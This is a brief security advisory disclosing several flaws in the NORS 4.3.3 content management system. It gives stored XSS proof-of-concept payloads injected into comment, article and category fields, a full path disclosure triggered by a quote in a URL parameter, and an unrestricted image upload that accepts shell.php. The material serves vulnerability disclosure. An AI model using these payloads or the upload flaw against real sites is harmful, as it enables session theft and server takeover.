CMS: NORS 4.3.3
Bug: Multiple Vulnerabilities
Version: public
URL: http://norsphp.com/get/4.3.3/zip/ [2]
Author: RubberDuck
Found Date: 03-02-10
Publication Date: 06-02-10
Permanent XSS PoC - Přidat komentář
Uživatelské jméno - SecIT
www - www.security-portal.cz">eSPecko</a><br><script>alert(/RubberDuck/)</script><a href="http://www.secit.sk
Permanent XSS PoC - Přidat článek
http://localhost/nors_v4.3.3/administration/content/?event=post&command=add [4]
Název - <script>alert(/RubberDuck/)</script>
This affects another sections:
http://localhost/nors_v4.3.3/administration/content/?event=comment&comma... [5]
Text - <script>alert(/RubberDuck/)</script>
Popisek - xxx"></a><a href="http://www.security-portal.cz">Security-Portal</a><script>alert(/RubberDuck/)</script><a href="http://www.security-portal.cz
Persistent XSS - Rubriky
http://localhost/nors_v4.3.3/administration/content/?event=category&comm... [7]
Název - <script>alert(/RubberDuck/)</script>
This affects another sections working with categories:
http://localhost/nors_v4.3.3/administration/content/?event=category&comm... [7]
http://localhost/nors_v4.3.3/administration/content/?event=category&comm... [8]
http://localhost/nors_v4.3.3/administration/content/?event=post&command=add [4]
Full Path Disclosure - administration
http://localhost/nors_v4.3.3/administration/content/?event=post'&command=add
Unsecure Image Upload - Přidat článek
http://localhost/nors_v4.3.3/administration/content/?event=post&command=add [4]
Obrázek - shell.php